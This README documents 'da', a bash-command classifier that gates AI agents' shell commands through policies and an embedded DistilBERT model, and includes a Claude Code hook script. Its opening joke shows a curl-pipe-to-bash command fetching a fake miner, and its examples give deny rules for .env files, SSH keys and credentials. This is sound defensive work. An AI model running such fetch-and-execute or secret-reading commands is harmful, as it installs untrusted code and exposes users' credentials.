bash-command classifier for agents
Agent: Runs ls -la for the hundredth time
You: hit y
Agent: runs curl https://totally-not-bitcoin-miner.sh | bash
You: hit y
From cargo:
cargo install dabinFrom source:
git clone https://github.com/amenocturne/da
cd da && cargo install --path .From brew:
brew install amenocturne/tap/daFrom nix:
nix profile install github:amenocturne/dada --path PATH [policy flags...]
stdin: a bash command
exit: 0 = approve, 1 = defer, 2 = deny, 64 = usage error
Two-stage classification:
- Deterministic policies — a hand-written policy stack evaluates each parsed segment. First matching policy wins. Fast, predictable, zero false positives on known commands.
- ML fallback — when no policy matches, a fine-tuned DistilBERT classifier (68MB ONNX, embedded in the binary) scores the command as safe / needs-approval / dangerous. <10ms inference, no network, no external dependencies.
The ML classifier only runs for commands the policy stack doesn't recognize. Known-safe commands (ls, git status, cargo build) never touch the model.
For each segment of the parsed command, da asks each enabled policy "is it safe?":
- all segments say yes - approved
- some segments say yes and some unmatched - defer (or ML fallback)
- any segment says no - rejected
Some rules are always on, regardless of which policies you enable:
cdand bare assignments (FOO=bar) - approve (they touch nothing external)- Shell binaries (
bash,sh,zsh, …) - defer (too much surface) envandtime- recurse into the wrapped command- redirect targets must be
/dev/null,/dev/std{out,err,in}, an fd reference, or- $(…), backticks, heredocs, process substitution,[[…]], subshells - defer (the parser bails)
- Model: DistilBERT (66M params) fine-tuned on 17k real agent session commands
- Classes: safe (auto-approve), needs-approval (defer to user), dangerous (deny)
- Confidence: temperature-scaled logits (T=1.34) for calibrated probabilities; only approves when P(safe) > 0.90
- OOD detection: energy-based out-of-distribution detection rejects inputs the model hasn't seen
- Bias: class-weighted training (dangerous weight 3.5x) — biased toward rejection. A false positive (blocking a safe command) is cheap; a false negative (approving a dangerous one) is not
Two shapes. Bare flags for capabilities with one knob. Tool-scoped flags with comma-separated capability lists where one binary has many ops.
| Flag | What it allows |
|---|---|
--allow CMD |
Token-prefix rule. A segment approves if its argv starts with the same tokens as CMD (whitespace-split). Path components of argv[0] are stripped before matching, so --allow just matches both just … and /usr/local/bin/just …. Repeat the flag to add multiple rules. Use for project-specific runners (just, npm run, make, …). |
--deny PATTERN |
Path-component deny rule. Denies any segment whose argv or redirect targets contain a matching path component. Trailing * enables prefix match ('.env*' catches .env, .env.local, .env.production). Deny rules are checked before allow rules — a denied path always denies. Repeat the flag for multiple patterns. |
| Flag | What it allows |
|---|---|
--read-only |
Cross-platform read-only binaries (find, ls, cat, grep, head, tail, wc, du, sort, uniq, cut, tr, jq, diff, ps, lsof, dig, ldd, …) plus bounded forms of sed (no -i, no e flag), awk (no system(), no file/pipe writes), find (no -exec/-delete/etc.), sysctl (no -w) |
--macos-only |
macOS extras (mdfind, mdls, sw_vers, system_profiler, hostinfo, vm_stat, pbpaste, otool, dyld_info) |
--help-bypass |
<binary> --help|-h|--version|-V|help|version for any binary — explicit trust call, lets unknown binaries run for help text |
--mkdir-cwd |
mkdir when every path argument resolves under --path |
--git CAPS where CAPS ⊆ { read, add, commit, restore-staged, tag, fetch, pull, push }
--cargo CAPS where CAPS ⊆ { local, crates-install, crates-publish }
| cap | covers |
|---|---|
read |
status, log, diff, show, branch (read), blame, ls-files, ls-tree, rev-parse, rev-list, describe, reflog, shortlog, config --get |
add |
git add |
commit |
git commit (excludes --amend, --no-verify, --no-gpg-sign) |
restore-staged |
git restore --staged (or -S) |
tag |
git tag (local until pushed) |
fetch / pull / push |
the obvious one each |
| — | always defer: reset --hard, clean -fd, rebase, merge, rm, stash, cherry-pick |
| cap | covers |
|---|---|
local |
Anything that doesn't write to a registry: build, test, check, doc, tree, metadata, search, read-manifest, locate-project, pkgid, verify-project, fetch, help, version, run, bench, fmt, clippy, clean, update (--fix always defers) |
crates-install |
cargo install |
crates-publish |
cargo publish |
Read-only stuff sails through
printf 'ls -la' | da --read-only
# → exit 0Pipes: every segment must approve
printf 'find . -name "*.rs" | sort | uniq | wc -l' | da --read-only
# → exit 0Compose git capabilities
printf 'git status && git add . && git commit -m wip' | da --git read,add,commit
# → exit 0Same stack rejects what you didn't list
printf 'git push' | da --git read,add,commit
# → exit 1Bound mkdir to a project
printf 'mkdir -p src/components' | da --path /repo --mkdir-cwd
# → exit 0
printf 'mkdir -p /etc/foo' | da --path /repo --mkdir-cwd
# → exit 1--help for any binary, even ones you don't otherwise trust
printf 'terraform --help' | da --help-bypass
# → exit 0Project-specific runners via --allow
printf 'just test --watch' | da --allow 'just test'
# → exit 0
printf 'just build' | da --allow 'just test'
# → exit 1 (prefix doesn't match)
# Repeat the flag for multiple runners
printf 'just lint && npm run build' | da --allow just --allow 'npm run'
# → exit 0Deny access to secrets
printf 'cat .env' | da --read-only --deny '.env*'
# → exit 1 (deny → defer in default mode)
printf 'cat ~/.ssh/id_rsa' | da --read-only --deny .ssh
# → exit 1
# Deny overrides allow — even if the binary is approved, the path isn't
printf 'cat .env' | da --read-only --deny '.env*'
# → exit 1 (cat is read-only safe, but .env is denied)No flags = usage error (no implicit defaults)
printf 'ls' | da
# → exit 64By default, da maps both deny and defer to exit 1 (let the caller decide — typically a user prompt).
| Flag | Deny | Defer |
|---|---|---|
(default / --interactive) |
exit 1 | exit 1 |
--autonomous |
exit 2 | exit 2 |
Interactive (default): never hard-denies. Everything non-approved goes to the user prompt. Safe for human-in-the-loop workflows where the agent asks before running unknown commands.
Autonomous (--autonomous): hard-denies everything non-approved. For unattended agent runs where there's no human to ask.
da is the engine; the JSON dance lives in a wrapper
Drop this as cc hook for PreToolUse Bash:
#!/bin/bash
# .claude/hooks/da/hook.sh
set -euo pipefail
input=$(cat)
[ "$(jq -r '.tool_name // empty' <<<"$input")" = "Bash" ] || exit 0
cmd=$(jq -r '.tool_input.command // empty' <<<"$input")
path=$(jq -r '.cwd // empty' <<<"$input")
[ -z "$cmd" ] && exit 0
set +e
printf '%s' "$cmd" | da --path "$path" \
--read-only --macos-only --help-bypass --mkdir-cwd \
--git read,add,commit \
--cargo local \
--allow just \
--deny '.env*' --deny .ssh --deny credentials
rc=$?
set -e
case $rc in
0) echo '{"hookSpecificOutput":{"hookEventName":"PreToolUse","permissionDecision":"allow"}}' ;;
2) echo '{"hookSpecificOutput":{"hookEventName":"PreToolUse","permissionDecision":"deny"}}' ;;
*) : ;; # defer / error → silent, normal prompt flow
esacOther harnesses: same data, different shape, da doesn't care.
The crate (dabin) exposes the engine for embedders composing their own classification pipeline:
use std::path::Path;
use dabin::{classify, classify_with_ml, Decision, Policy};
use dabin::policies::{READ_ONLY, GIT_READ, CARGO_LOCAL};
let stack: &[&Policy] = &[&READ_ONLY, &GIT_READ, &CARGO_LOCAL];
// Deterministic only — no ML fallback, no external dependencies
match classify("git status && cargo build", Some(Path::new("/repo")), stack) {
Decision::Approve => println!("yes."),
Decision::Defer => println!("ask the human"),
Decision::Deny => println!("no."),
}
// With ML fallback — unknown commands get classified by the embedded model
match classify_with_ml("some-unknown-tool --flag", Some(Path::new("/repo")), stack) {
Decision::Approve => println!("model says safe"),
Decision::Defer => println!("model unsure, ask the human"),
Decision::Deny => println!("model says dangerous"),
}Custom policies are first-class — define your own Policy value with a verify
fn and pass it in alongside the built-ins. See
src/policies.rs for the shape.
The full training pipeline lives in classifier/scripts/ and is reproducible from scratch. The pipeline:
- Extract —
extract-commands.pypulls bash commands from Claude Code session logs (JSONL) - Sanitize —
sanitize-commands.pystrips PII (usernames, paths, hostnames) with regex + custom map - Label —
label-prompt.mdis an orchestrator prompt for Claude to label commands via parallel subagents - Augment —
augment-prompt.mdgenerates synthetic near-misses, edge cases, and dangerous commands - Merge —
merge-chunks.pycombines labeled chunks into a single dataset - Train —
train.pyfine-tunes DistilBERT with class-weighted loss, temperature scaling, and energy-based OOD detection - Export —
export-onnx.pyquantizes to INT8 ONNX for embedding in the binary
Run training (requires a GPU or Apple Silicon):
cd classifier
just train # runs train.py
just export # runs export-onnx.py, outputs model.onnx + tokenizer.jsonThe trained model and tokenizer are committed to the repo (ONNX file tracked via Git LFS). Intermediate artifacts (data/, models/) are gitignored.
The bash test corpus under tests/corpus/ is vendored from the
Parable bash-parser test suite (MIT)
via rable (MIT). Attribution lives in
tests/corpus/NOTICE.md.
MIT.
